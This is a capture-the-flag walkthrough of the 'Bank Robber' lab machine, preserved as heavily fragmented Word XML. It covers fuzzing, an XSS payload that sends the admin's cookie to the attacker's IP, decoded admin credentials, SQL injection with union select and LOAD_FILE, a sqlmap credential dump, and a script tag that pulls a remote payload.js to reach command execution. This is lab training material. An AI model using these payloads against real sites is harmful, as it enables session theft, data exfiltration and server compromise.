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Bank Robber</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Insane</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an nmap scan, we see ports 80, 443, 445, and 3306 are open.</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7686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website, we are presented with a login and registration page. </w:t>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4147" cy="555783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04147" cy="55578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we always take when presented with a web page is to start fuzzing it for other web directories. I am going to do this with ffuf.</w:t>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92100"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="39"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8102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4429125"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="1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8479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ffuf -w /opt/SecLists/Discovery/Web-Content/common.txt -u http://10.10.10.154/FUZZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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ran, I looked into registering a user on the website. We were successful in doing this and were able to log in. One thing to note was the displaying of a message in the URL when I created a user. This may be something to look into later.</w:t>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476250"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="37"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3571875"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433387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005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registered user</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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website, we see we can transfer money, if we had money to transfer. Putting in some fake values for these fields, we get a report back saying an admin will look at the request later and decide whether or not it is good. </w:t>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3981450"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="38"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3905250" cy="3981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1438275"/>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67325" cy="1438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it may be possible to steal the admin cookies through a XSS attack. Looking into this with inspect element on the page, we go to “storage” then “cookies” and select the “password” section. In this, we see that the password we used earlier is the cookie. Furthermore, the cookie is “HttpOnly FALSE,” meaning it is possible to steal cookies. If HttpOnly was set to TRUE, then cookie stealing would not be possible. </w:t>
      </w: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 Stealing</w:t>
      </w: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134302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626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750" cy="1981200"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="33"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2571750" cy="198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information, we construct a basic XSS query to grab the admin cookie and send it back to us. First we set up a python http server running on port 80, then place our query within burpsuite so we can continuously repeat it if needed. After this, running the query will get us back a cookie. </w:t>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86425" cy="342900"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="34"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6864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438150"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="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622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39700"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="32"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581025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/?cookie=dXNlcm5hbWU9WVdSdGFXNCUzRDsgcGFzc3dvcmQ9U0c5d1pXeGxjM055YjIxaGJuUnBZdyUzRCUzRDsgaWQ9MQ== HTTP/1.1"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">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&lt;img src=x onerror=this.src="</w:t>
            </w:r>
            <w:hyperlink r:id="rId19">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i w:val="1"/>
                  <w:color w:val="1155cc"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">http://10.10.14.34/?cookie=</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i w:val="1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"+btoa(document.cookie) /&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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cookie, we can tell it is base64 encoded. Taking the cookie and decoding it presents us with a username and password which are both base64 encoded too. Decoding these then gets us the admin user and their password. </w:t>
      </w:r>
    </w:p>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638175"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="2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991100" cy="638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533400"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="25"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2838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495300"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="21"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3829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how I did not include the “%3D” from the original? Those are equal signs. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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now retrieved the web admin’s username and password of “Hopelessromantic”</w:t>
      </w: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Admin</w:t>
      </w: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into the web admin page, we are presented with a basic web page with an interesting feature called “backdoor checker.” </w:t>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36880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810250" cy="436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out the command execution on backdoorchecker, we find we cannot do anything since we are not localhost. Going to the search users tab, we can search users by their IDs. Testing this out, I found the admin account, “gio”, and myself. </w:t>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1200150"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="2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7147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1143000"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="28"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5433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1104900"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="2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552825" cy="110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seems to be querying a SQL server, so it may be reasonable to test for SQL injection. Testing this idea out, we find sql  injection is possible. </w:t>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1009650"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="35"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34956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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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step is to perform some sort of SQL injection to hopefully get code execution.</w:t>
      </w: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Injection</w:t>
      </w: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this over to burp suite, we want to find out how many columns are in the table. We find there are 3. Changing the “3” in the query to a “4” gives us an error. </w:t>
      </w:r>
    </w:p>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451100"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="40"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5810250"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we are going to do is use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. First, we need to capture a valid request and save it to a file. </w:t>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2333" cy="4976813"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="22"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4332333" cy="4976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named the file “search.req”. Next, we can run sqlmap against the page. We construct the query with the “r” flag for “request”, specify the database type of “mysql”, use the “union” technique, and dump all the information we can find. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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3900" cy="390525"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="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5339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sqlmap will ask questions. To skip them, do “--batch”</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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get results from mysql showing us a list of usernames and passwords followed with accounts with their balances. </w:t>
      </w:r>
    </w:p>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0455" cy="4129088"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="24"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370455" cy="41290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passwords are not hashed. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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take note of “gio:gio”, but for now we want to attempt a sql injection. First, we are going to see what type of user is running the database with the “user()” or “system_user()” function. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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29870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810250" cy="229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that root@localhost is running the database. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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of mysql is the ability to read files with the “LOAD_FILE(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>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 function. Testing this out, we find we are able to read files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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57175"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="19"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6578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562100"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="30"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8102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1'+union+select+1,LOAD_FILE('C:/windows/system32/license.rtf'),3--+-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(URL encoded)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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can read files, it would be best to see if there is any useful data lying around the mysql directory. To find out where this is, we use “</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">@@datadir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7525" cy="285750"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="18"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30575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457200"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="14"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1847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1'+union+select+1,@@datadir,3--+-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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the mysql directory is “C:/xampp/mysql/data/”. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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we saw “backdoorchecker.” This script may allow us to execute code on the server, so we want to know its contents. We know it is located in the “/admin” directory. Doing a little research, XAMPP creates a directory in windows called “</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">C:/xampp/htdocs/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">” whereas in linux it is “</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/lampp/htdocs</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">”. This is where code goes for a website and scripts being used. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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31800"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="17"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8102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003800"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="31"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810250" cy="500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contents of “backdoorchecker”, we see the script is using two other files called “link.php” and “auth.php.” Taking a look at “auth”, we find a script to check for the web user’s username and password. “Link.php”, on the otherhand, shows the root user and password for the mysql database. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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276225"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="15"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153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1085850"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="16"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3914775" cy="1085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backdoor script, we see the script is checking for some bad characters. Specifically,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“&amp;”</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. It is not much, but we can get around this with pipes. Additionally, we need to make the server send a request through itself then to us - a sort of reverse request. So what we need to make the server perform a POST request to itself, then do something to us with a pipe. To do this, we are going to use this script to test which will ping us. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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085850"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="5"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810250" cy="1085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making a XML Http POST request to the localhost server (10.10.10.154), setting the content type header to be equivalent to the one sent by “backdoorchecker.php”, then sending our cookie holding web admin creds. Finally, we send out the request and set up a listener for pings. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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send this request through the same field we got the web admin’s cookies - another XSS attack. We do not need to change anything other than the “comment” field. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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04800"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="4"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8102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&lt;script scr=http://10.10.14.34/payload.js&gt;&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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901700"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="7"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5810250"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receive the pings, we need to set up a listener with “tcpdump”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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771525"/>
                  <wp:effectExtent b="0" l="0" r="0" t="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676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Tcpdump -i tun0 icmp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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361950"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3"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4200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304800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="36"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5010150" cy="30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25.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.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3.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.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30.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.10.14.34/?cookie=" TargetMode="External"/><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